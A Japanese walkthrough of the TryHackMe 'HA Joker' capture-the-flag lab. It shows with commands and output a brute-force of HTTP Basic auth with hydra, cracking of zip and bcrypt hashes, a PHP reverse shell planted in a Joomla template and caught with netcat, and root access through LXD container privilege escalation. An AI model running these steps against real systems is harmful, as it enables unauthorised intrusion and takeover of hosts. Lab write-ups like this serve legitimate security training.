【TryHackMe】HA Joker CTF：Walkthrough

概要

TryHackMe「HA Joker CTF」のWalkthroughです。

Task1

Q2.What version of Apache is it?

ポートスキャンを実行します。

$ nmap -Pn -T4 -sVC -A --min-rate 5000 -p- 10.10.111.217 -oN nmap_result
ORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:20:1f:f4:33:1b:00:70:b3:85:cb:87:00:c4:f4:f7 (RSA)
|   256 1b:f9:a8:ec:fd:35:ec:fb:04:d5:ee:2a:a1:7a:4f:78 (ECDSA)
|_  256 dc:d7:dd:6e:f6:71:1f:8c:2c:2c:a1:34:6d:29:99:20 (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Joker
|_http-server-header: Apache/2.4.29 (Ubuntu)
8080/tcp open  http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Please enter the password.
|_http-title: 401 Unauthorized

ポートの稼働状況が分かりました。

ポート	サービス	バージョン
22	ssh	OpenSSH 7.6p1
80	http	Apache httpd 2.4.29
8080	http	Apache httpd 2.4.29

A.2.4.29

Q3.What port on this machine not need to be authenticated by user and password?

80番ポートに認証なしでアクセス出来ました。

A.80

Q4.There is a file on this port that seems to be secret, what is it?

Hint.Extensions File, dirb command comes with a flag that append each word with this extensions. Try to use dirb with a file that contains some commons extensions in a web server.

ディレクトリスキャンをします。

$ dirsearch -u http://10.10.111.217
[00:56:15] 301 -  312B  - /css  ->  http://10.10.111.217/css/
[00:56:31] 301 -  312B  - /img  ->  http://10.10.111.217/img/
[00:56:51] 200 -   24KB - /phpinfo.php

$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -u http://10.10.111.217/FUZZ -recursion -recursion-depth 1 -ic -c -e .php,.html,.js,.txt
index.html              [Status: 200, Size: 5954, Words: 783, Lines: 97, Duration: 240ms]
secret.txt              [Status: 200, Size: 320, Words: 62, Lines: 7, Duration: 240ms]

/phpinfo.php,secret.txtを発見できました。

A.secret.txt

Q5.There is another file which reveals information of the backend, what is it?

A.phpinfo.php

Q6.When reading the secret file, We find with a conversation that seems contains at least two users and some keywords that can be intersting, what user do you think it is?

secret.txtにはバットマンとジョーカーの会話が記載されています。

secret.txt

Batman hits Joker.
Joker: "Bats you may be a rock but you won't break me." (Laughs!)
Batman: "I will break you with this rock. You made a mistake now."
Joker: "This is one of your 100 poor jokes, when will you get a sense of humor bats! You are dumb as a rock."
Joker: "HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA! HA!"

A.joker

Q7.What port on this machine need to be authenticated by Basic Authentication Mechanism?

A.8080

Q8.At this point we have one user and a url that needs to be aunthenticated, brute force it to get the password, what is that password?

Hint.Maybe burp with format user:pass and encode with base64? Note: Don't forget decode it!!

8080ポートにアクセスするにはHTTP Basic認証を突破する必要があります。
ブルートフォース攻撃でパスワードを特定します。

$ hydra -f -l joker -P /usr/share/wordlists/rockyou.txt -s 8080 10.10.83.94 http-get /
[8080][http-get] host: 10.10.83.94   login: joker   password: hannah

A.hannah

Q9.Yeah!! We got the user and password and we see a cms based blog. Now check for directories and files in this port. What directory looks like as admin directory?

Hint.Nikto with the credentials we obtained?

Username: joker,Password: hannahで8080にアクセスできました。

joomlaというCMSを利用していることが分かりました。

/administrator/で管理画面にアクセスできるようです。

A./administrator/

Q10.We need access to the administration of the site in order to get a shell, there is a backup file, What is this file?

ディレクトリスキャンをします。

$ dirsearch -u http://10.10.83.94:8080/ -H "Authorization: Basic am9rZXI6aGFubmFo"
[11:29:28] 301 -  325B  - /administrator  ->  http://10.10.83.94:8080/administrator/
[11:29:29] 200 -    2KB - /administrator/
[11:29:29] 403 -  278B  - /administrator/includes/
[11:29:29] 200 -    2KB - /administrator/index.php
[11:29:29] 200 -   31B  - /administrator/cache/
[11:29:29] 200 -   31B  - /administrator/logs/
[11:29:29] 301 -  330B  - /administrator/logs  ->  http://10.10.83.94:8080/administrator/logs/
[11:29:38] 301 -  315B  - /bin  ->  http://10.10.83.94:8080/bin/
[11:29:38] 200 -   31B  - /bin/
[11:29:40] 301 -  317B  - /cache  ->  http://10.10.83.94:8080/cache/        
[11:29:40] 200 -   31B  - /cache/
[11:29:42] 200 -   31B  - /cli/
[11:29:43] 200 -   12MB - /backup
[11:29:43] 200 -   12MB - /backup.zip
[11:29:44] 301 -  322B  - /components  ->  http://10.10.83.94:8080/components/
[11:29:44] 200 -   31B  - /components/
[11:29:46] 200 -    0B  - /configuration.php
[11:30:01] 200 -    1KB - /htaccess.txt
[11:30:03] 301 -  318B  - /images  ->  http://10.10.83.94:8080/images/      
[11:30:03] 200 -   31B  - /images/
[11:30:03] 301 -  320B  - /includes  ->  http://10.10.83.94:8080/includes/  
[11:30:03] 200 -   31B  - /includes/
[11:30:04] 200 -    4KB - /index.php
[11:30:04] 404 -    9B  - /index.php/login/
[11:30:08] 301 -  320B  - /language  ->  http://10.10.83.94:8080/language/  
[11:30:08] 200 -   31B  - /layouts/
[11:30:09] 200 -   31B  - /libraries/
[11:30:09] 301 -  321B  - /libraries  ->  http://10.10.83.94:8080/libraries/
[11:30:09] 200 -    7KB - /LICENSE
[11:30:09] 200 -    7KB - /LICENSE.txt
[11:30:14] 301 -  317B  - /media  ->  http://10.10.83.94:8080/media/        
[11:30:14] 200 -   31B  - /media/
[11:30:16] 301 -  319B  - /modules  ->  http://10.10.83.94:8080/modules/    
[11:30:16] 200 -   31B  - /modules/
[11:30:27] 301 -  319B  - /plugins  ->  http://10.10.83.94:8080/plugins/    
[11:30:27] 200 -   31B  - /plugins/
[11:30:31] 200 -    2KB - /README
[11:30:31] 200 -    2KB - /README.txt
[11:30:33] 200 -  395B  - /robots.txt
[11:30:35] 403 -  278B  - /server-status
[11:30:35] 403 -  278B  - /server-status/
[11:30:44] 301 -  321B  - /templates  ->  http://10.10.83.94:8080/templates/
[11:30:45] 200 -   31B  - /templates/
[11:30:45] 200 -   31B  - /templates/index.html
[11:30:45] 200 -    0B  - /templates/beez3/
[11:30:45] 200 -    0B  - /templates/protostar/
[11:30:45] 200 -    0B  - /templates/system/
[11:30:46] 200 -   31B  - /tmp/
[11:30:46] 301 -  315B  - /tmp  ->  http://10.10.83.94:8080/tmp/
[11:30:54] 200 -  567B  - /web.config
[11:30:54] 200 -  567B  - /web.config.txt

/backup.zipが見つかりました。

A.backup.zip

Q11.We have the backup file and now we should look for some information, for example database, configuration files, etc ... But the backup file seems to be encrypted. What is the password?

Hint*.Use john to crack the zip hash

ZIPにはパスワードがかかっているので解析します。

$ zip2john backup.zip > zip_hash

$ john zip_hash --wordlist=/usr/share/wordlists/rockyou.txt
hannah           (backup.zip)

A.hannah

Q12.Remember that... We need access to the administration of the site... Blah blah blah. In our new discovery we see some files that have compromising information, maybe db? ok what if we do a restoration of the database! Some tables must have something like user_table! What is the super duper user?

ZIPファイルを解凍するとdb/joomladb.sqlを得られました。

ユーザー情報を入手できました。

A.admin

Q13.Super Duper User! What is the password?

Hint.Again, john and mysql hash password.

ハッシュ値を解析します。

$ hashcat -a 0 -m 3200 admin_hash /usr/share/wordlists/rockyou.txt
$2y$10$b43UqoH5UpXokj2y9e/8U.LD8T3jEQCuxG2oHzALoJaj9M5unOcbG:abcd1234

A.abcd1234

Q14.At this point, you should be upload a reverse-shell in order to gain shell access. What is the owner of this session?

Hint.Maybe use error.php page on a template? Of course try it and execute 'id' command.

Username: admin,Password: abcd1234で管理画面にアクセスできました。

HackTricksを参考に進めます。

/administrator/index.php?option=com_templatesでテンプレート管理ページにアクセスします。

Templateカラムのprotostarを選択し、error.phpを編集します。

PHPリバースシェルのソースコードを貼り付けました。

/templates/protostar/error.phpにアクセスし、Netcatをリッスンしているとリバースシェルを張れました。

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.6.55.144] from (UNKNOWN) [10.10.217.226] 55470
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 09:12:12 up 20 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

A.www-data

Q15.This user belongs to a group that differs on your own group, What is this group?

Hint.Linux containers

www-dataユーザーはlxdグループに所属しています。

$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),115(lxd)

A.lxd

Q16.Spawn a tty shell.

Hint.python3

TTYを設定します。

$ python3 -c 'import pty; pty.spawn("/bin/bash")'

Q18.Research how to escalate privileges using LXD permissions and check to see if there are any images available on the box.

Hint.If there isn't an image already on the box, you may need to upload one...

イメージを確認します。

$ lxc image list
lxc image list
+-------+-------------+--------+-------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+------+------+-------------+

イメージが無いのでKaliからダウンロードします。

$ wget http://10.6.55.144/alpine-v3.13-x86_64-20210218_0139.tar.gz

$ lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias myimage

$ lxc image list
lxc image list
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
|  ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| myimage | cd73881adaac | no     | alpine v3.13 (20210218_01:39) | x86_64 | 3.11MB | Oct 13, 2024 at 4:24pm (UTC) |
+---------+--------------+--------+-------------------------------+--------+--------+------------------------------+

Q19.The idea here is to mount the root of the OS file system on the container, this should give us access to the root directory. Create the container with the privilege true and mount the root file system on /mnt in order to gain access to /root directory on host machine.

Hint.lxc init ... lxc config device ... lxc start ... lxc exec ...

権限昇格をします。

$ lxc init myimage ignite -c security.privileged=true

$ lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

$ lxc start ignite

$ lxc exec ignite /bin/sh
lxc exec ignite /bin/sh
~ # ^[[30;5R

~ # ^[[30;5Rwhoami
whoami
root

rootシェルを取得できました。

Q20.What is the name of the file in the /root directory?

/mnt/root/root配下にfinal.txtを発見しました。

ls -la root
total 40
drwx------    5 root     root          4096 Oct 25  2019 .
drwxr-xr-x   22 root     root          4096 Oct 22  2019 ..
-rw-------    1 root     root            40 Oct 25  2019 .bash_history
-rw-r--r--    1 root     root          3106 Apr  9  2018 .bashrc
drwx------    2 root     root          4096 Oct 22  2019 .cache
drwxr-x---    3 root     root          4096 Oct 24  2019 .config
drwxr-xr-x    3 root     root          4096 Oct  8  2019 .local
-rw-------    1 root     root            33 Oct 24  2019 .mysql_history
-rw-r--r--    1 root     root           148 Aug 17  2015 .profile
-rw-r--r--    1 root     root          1003 Oct  8  2019 final.txt

cat root/final.txt

     ██╗ ██████╗ ██╗  ██╗███████╗██████╗ 
     ██║██╔═══██╗██║ ██╔╝██╔════╝██╔══██╗
     ██║██║   ██║█████╔╝ █████╗  ██████╔╝
██   ██║██║   ██║██╔═██╗ ██╔══╝  ██╔══██╗
╚█████╔╝╚██████╔╝██║  ██╗███████╗██║  ██║
 ╚════╝  ╚═════╝ ╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
                                         
!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Aarti Singh: https://in.linkedin.com/in/aarti-singh-353698114

+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+

A.final.txt